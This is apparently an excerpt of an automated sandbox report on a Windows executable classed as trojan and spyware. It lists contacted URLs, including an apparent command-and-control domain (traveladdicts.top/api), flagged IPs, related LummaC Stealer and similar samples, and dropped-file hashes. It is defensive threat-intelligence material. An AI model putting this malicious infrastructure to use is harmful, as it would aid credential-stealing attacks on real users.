                                                              http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0##Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                                                                high
                                                                https://traveladdicts.top/z#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1758494799.000000000365A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://sectigo.com/CPS0#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                                                                  high
                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://rentry.co/static/icons/512.png#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2253914618.0000000003661000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2252940545.0000000000872000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.0000000000872000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.000000000508C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000004EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp, KOZ4VON644XMYEN5.ps1.0.drfalse
                                                                      high
                                                                      https://rentry.co/static/icons/270.pnLRpowershell.exe, 00000007.00000002.2258828661.000000000508C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.microXO#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.000000000085C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://traveladdicts.top/n)6#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2245994632.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0##Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                                                                          high
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://traveladdicts.top/#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.000000000081F000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2225011826.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2085160314.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2098375741.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.000000000367B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2080065178.000000000089C000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2245994632.0000000000892000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.0000000000832000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.000000000081C000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908671086.000000000081D000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2080065178.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2083156314.000000000083C000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2083156314.000000000081F000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000367B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908607385.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907875064.000000000365F000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000002.2255853718.0000000000820000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907535156.000000000365D000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2085349574.000000000367B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.000000000367C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://traveladdicts.top/api2#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2080065178.0000000000886000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://traveladdicts.top:443/apitps://traveladdicts.top:443/api#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2080065178.000000000089C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://ocsp.rootca1.amazontrust.com0:#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://rentry.co/static/icons/270.png#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2253914618.0000000003661000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2252940545.0000000000872000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.0000000000872000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.000000000508C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000004EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp, KOZ4VON644XMYEN5.ps1.0.drfalse
                                                                                  high
                                                                                  https://www.ecosia.org/newtab/#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890442481.000000000367A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://ac.ecosia.org/autocomplete?q=#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://crl.micropowershell.exe, 00000007.00000002.2257624575.0000000003094000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                                                                                              high
                                                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.0000000003679000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000366E000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.0000000003679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://rentry.co/#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2253914618.0000000003661000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2252940545.0000000000872000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000002.2256477161.0000000000888000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2245994632.0000000000886000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.0000000000872000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.000000000508C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000004EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp, KOZ4VON644XMYEN5.ps1.0.drfalse
                                                                                                  high
                                                                                                  http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                                                                                                    high
                                                                                                    http://www.testlab2008.com/indices/submit.php?c=CD&i=#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890442481.000000000367A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890442481.000000000367A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.0000000003679000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890442481.000000000367A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000366E000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.0000000003679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://traveladdicts.top:443/api#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908607385.0000000000897000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              104.26.3.16
                                                                                                              rentry.coUnited States
                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                              172.67.202.141
                                                                                                              traveladdicts.topUnited States
                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                                              Analysis ID:1601483
                                                                                                              Start date and time:2025-01-28 16:11:11 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 5m 46s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:10
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
                                                                                                              renamed because original name is a hash value
                                                                                                              Original Sample Name:.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@4/4@4/2
                                                                                                              EGA Information:Failed
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 9
                                                                                                              • Number of non-executed functions: 2
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212, 13.95.31.18, 4.175.87.197
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, PID 7772 because there are no executed function
                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 4640 because it is empty
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              TimeTypeDescription
                                                                                                              10:12:34API Interceptor9x Sleep call for process: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe modified
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              104.26.3.16random.exeGet hashmaliciousLummaCBrowse
                                                                                                                #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exeGet hashmaliciousLummaCBrowse
                                                                                                                  random.exeGet hashmaliciousLummaCBrowse
                                                                                                                    same.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                                                      !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                        Full-Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                          file.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                            grA6aqodO5.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                              SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeGet hashmaliciousXWormBrowse
                                                                                                                                nkYzjyrKYK.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                  172.67.202.141Jeffrey.laws Replay VM (01m27sec).docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    phish_alert_sp2_2.0.0.0 (27).emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      https://deutsche-post-infos.com/Get hashmaliciousUnknownBrowse
                                                                                                                                        http://mail.finance-asp4.comGet hashmaliciousUnknownBrowse
                                                                                                                                          http://weatherchalk.orgGet hashmaliciousUnknownBrowse
                                                                                                                                            https://analytics.webnorth.cloud/?module=Login&action=acceptInvitation&token=4e85c7ac842c08a74fec44d4668b7a9aGet hashmaliciousUnknownBrowse
                                                                                                                                              uX24M5IH33.exeGet hashmaliciousRaccoon RedLine SmokeLoaderBrowse
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                rentry.corandom.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.26.3.16
                                                                                                                                                random.exeGet hashmaliciousAmadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                                                                                                                                                • 104.26.2.16
                                                                                                                                                atlantis4en.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.26.2.16
                                                                                                                                                #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.26.2.16
                                                                                                                                                #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.26.3.16
                                                                                                                                                random.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                • 104.26.3.16
                                                                                                                                                random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.26.3.16
                                                                                                                                                random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 172.67.75.40
                                                                                                                                                XWorm RAT V2.1.exeGet hashmaliciousNjrat, XWormBrowse
                                                                                                                                                • 172.67.75.40
                                                                                                                                                random.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                                                                                • 172.67.75.40
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                CLOUDFLARENETUShttps://pub-6001c4a55cf84413a41e24da9a9d5948.r2.dev/OnDrive-%20complete%20with%20Docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 104.17.25.14
                                                                                                                                                Set-UPl.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                https://share.hsforms.com/1_2WOdMKeTWCrk3shrRFEBQt7nc8Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 104.16.117.116
                                                                                                                                                Thegarden Benefit Memo.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.21.2.8
                                                                                                                                                PDFQOUTE COMFIRMATION pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 104.21.16.1
                                                                                                                                                MACHINE QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                • 172.67.74.152
                                                                                                                                                file_1737764438853.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                WebCompanionInstaller-12.901.5.1061-prod.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.16.149.130
                                                                                                                                                WebCompanionInstaller-12.901.5.1061-prod.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.16.148.130
                                                                                                                                                https://forms.office.com/e/UfhfB5zRtiGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 104.17.25.14
                                                                                                                                                CLOUDFLARENETUShttps://pub-6001c4a55cf84413a41e24da9a9d5948.r2.dev/OnDrive-%20complete%20with%20Docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 104.17.25.14
                                                                                                                                                Set-UPl.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                https://share.hsforms.com/1_2WOdMKeTWCrk3shrRFEBQt7nc8Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 104.16.117.116
                                                                                                                                                Thegarden Benefit Memo.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.21.2.8
                                                                                                                                                PDFQOUTE COMFIRMATION pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 104.21.16.1
                                                                                                                                                MACHINE QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                • 172.67.74.152
                                                                                                                                                file_1737764438853.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                WebCompanionInstaller-12.901.5.1061-prod.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.16.149.130
                                                                                                                                                WebCompanionInstaller-12.901.5.1061-prod.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.16.148.130
                                                                                                                                                https://forms.office.com/e/UfhfB5zRtiGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 104.17.25.14
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1Set-UPl.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.26.3.16
                                                                                                                                                • 172.67.202.141
                                                                                                                                                vxaZNB3wGd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.26.3.16
                                                                                                                                                • 172.67.202.141
                                                                                                                                                k6JaohgQKp.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.26.3.16
                                                                                                                                                • 172.67.202.141
                                                                                                                                                a33kcGf1aA.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.26.3.16
                                                                                                                                                • 172.67.202.141
                                                                                                                                                vxaZNB3wGd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.26.3.16
                                                                                                                                                • 172.67.202.141
                                                                                                                                                a33kcGf1aA.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.26.3.16
                                                                                                                                                • 172.67.202.141
                                                                                                                                                cHAxMzM3_crypted_LAB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.26.3.16
                                                                                                                                                • 172.67.202.141
                                                                                                                                                REQUIRED-ORDER-REF.cmd.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 104.26.3.16
                                                                                                                                                • 172.67.202.141
                                                                                                                                                Racoona.htaGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.26.3.16
                                                                                                                                                • 172.67.202.141
                                                                                                                                                setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.26.3.16
                                                                                                                                                • 172.67.202.141
                                                                                                                                                No context
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):64
                                                                                                                                                Entropy (8bit):0.6599547231656377
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Nllluly/:NllU
                                                                                                                                                MD5:CD58C7193AF7B74B8F5AB012CEAA83D1
                                                                                                                                                SHA1:48F5F741531E2611CC155853BB9BFCF470AD2262
                                                                                                                                                SHA-256:AA0870FDCF90E60FC4555437FED5E92D49DE3A7C81E2E66D5763B25CF58EE4D7
                                                                                                                                                SHA-512:B2F920ED07178691B4568D9459954BE281284DBA8E5DAC76147764180AE78306E32630098A1EA2F8D5721E56B87EE80E6C96BF73E96F44D3A19F15759613F3CF
                                                                                                                                                Malicious:false
